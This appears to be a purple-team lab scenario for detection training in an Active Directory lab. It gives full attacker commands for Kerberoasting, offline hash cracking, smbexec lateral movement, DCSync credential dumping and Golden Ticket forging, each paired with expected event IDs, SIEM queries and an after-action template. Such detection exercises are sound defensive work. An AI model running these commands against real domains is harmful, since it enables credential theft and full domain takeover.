Scenario: Domain Compromise Chain

Status: Scaffold — content in progress

Lab: AD Lab
ATT&CK: T1558.003, T1550.002, T1003.006, T1558.001
Difficulty: Intermediate
Estimated Time: 60–90 minutes

Narrative

A threat actor has obtained initial access via a phished domain user account (low privilege). The objective is to achieve Domain Admin and establish persistence before the incident response team detects the activity.

This scenario mirrors real-world intrusion patterns observed in ransomware pre-deployment phases and state-sponsored lateral movement.

Pre-Exercise Checklist

AD lab running: DC01, WS01 online
Kali attacker connected to lab network
Wazuh SIEM receiving Windows Security events from DC01
Audit policy enabled: Kerberos Service Ticket Operations, Account Logon, DS Access
BloodHound CE running
Take clean snapshot before starting

Attacker Steps

Step 1 — Recon: Kerberoasting

# Enumerate Kerberoastable accounts
GetUserSPNs.py ITDR/lowpriv:Password1@192.168.56.10 -dc-ip 192.168.56.10
# Request tickets
GetUserSPNs.py ITDR/lowpriv:Password1@192.168.56.10 -dc-ip 192.168.56.10 -request -outputfile spn_hashes.txt

ATT&CK: T1558.003
Expected log: Event 4769 on DC01 (multiple RC4 service tickets from Kali IP)

Step 2 — Crack the Hash

hashcat -m 13100 spn_hashes.txt /usr/share/wordlists/rockyou.txt -r rules/best64.rule
# Recover svc-sql password: Password123!

ATT&CK: T1110.002
Expected log: None (offline activity)

Step 3 — Lateral Movement: Pass-the-Hash

# Get NTLM hash of svc-sql (now we have password, so we can derive hash or dump after auth)
# Use credentials directly for lateral movement first
smbexec.py ITDR/svc-sql:Password123!@192.168.56.10

ATT&CK: T1550.002
Expected log: Event 4624 LogonType 3 from Kali IP on DC01

Step 4 — DCSync (DA-equivalent required)

# If svc-sql has DCSync rights (or escalated via ACL abuse):
secretsdump.py ITDR/svc-sql:Password123!@192.168.56.10 -dc-ip 192.168.56.10 -just-dc-ntlm
# Extract krbtgt hash

ATT&CK: T1003.006
Expected log: Event 4662 (DS-Replication-Get-Changes) on DC01

Step 5 — Persistence: Golden Ticket

# Forge Golden Ticket with krbtgt hash
ticketer.py -nthash <krbtgt_hash> -domain-sid S-1-5-21-... -domain itdr.lab administrator
# Load ticket
export KRB5CCNAME=administrator.ccache
# Use ticket
secretsdump.py -k -no-pass dc01.itdr.lab

ATT&CK: T1558.001
Expected log: Event 4768/4769 with unusual TGT lifetime or source

Defender Monitoring Checklist

Attack Step	SIEM Query	Expected Alert
Kerberoasting	Filter 4769, etype=0x17, >5 requests	High-volume RC4 service ticket requests
PTH	Filter 4624, LogonType=3, source=Kali IP	Unusual source IP for svc-sql
DCSync	Filter 4662, DS-Replication-Get-Changes	Replication from non-DC
Golden Ticket	Filter 4769, unusual TGT lifetime	May require MDI

Expected Detection Results

Step	Detection Coverage	DRL
Kerberoasting	High — Event 4769 + RC4 filter	DRL-5
Crack (offline)	None by design	DRL-0
PTH	Medium — depends on baseline	DRL-4
DCSync	High — Event 4662 filter	DRL-5
Golden Ticket	Low — hard without MDI	DRL-2

After-Action Review Template

Date: 
Lab Operator:
Detection Coverage:
  - Kerberoasting: [Detected / Not Detected / False Positive]
  - DCSync: [Detected / Not Detected / False Positive]
  - Golden Ticket: [Detected / Not Detected]

Gaps Identified:
  1.
  2.

Improvements:
  1.
  2.

Cross-Links

Topic	Link
Kerberoasting	kerberoasting
DCSync	dcsync
Golden Ticket	golden-ticket
Simulation Framework	simulation-framework

Narrative​

Pre-Exercise Checklist​

Attacker Steps​

Step 1 — Recon: Kerberoasting​

Step 2 — Crack the Hash​

Step 3 — Lateral Movement: Pass-the-Hash​

Step 4 — DCSync (DA-equivalent required)​

Step 5 — Persistence: Golden Ticket​

Defender Monitoring Checklist​

Expected Detection Results​

After-Action Review Template​

Cross-Links​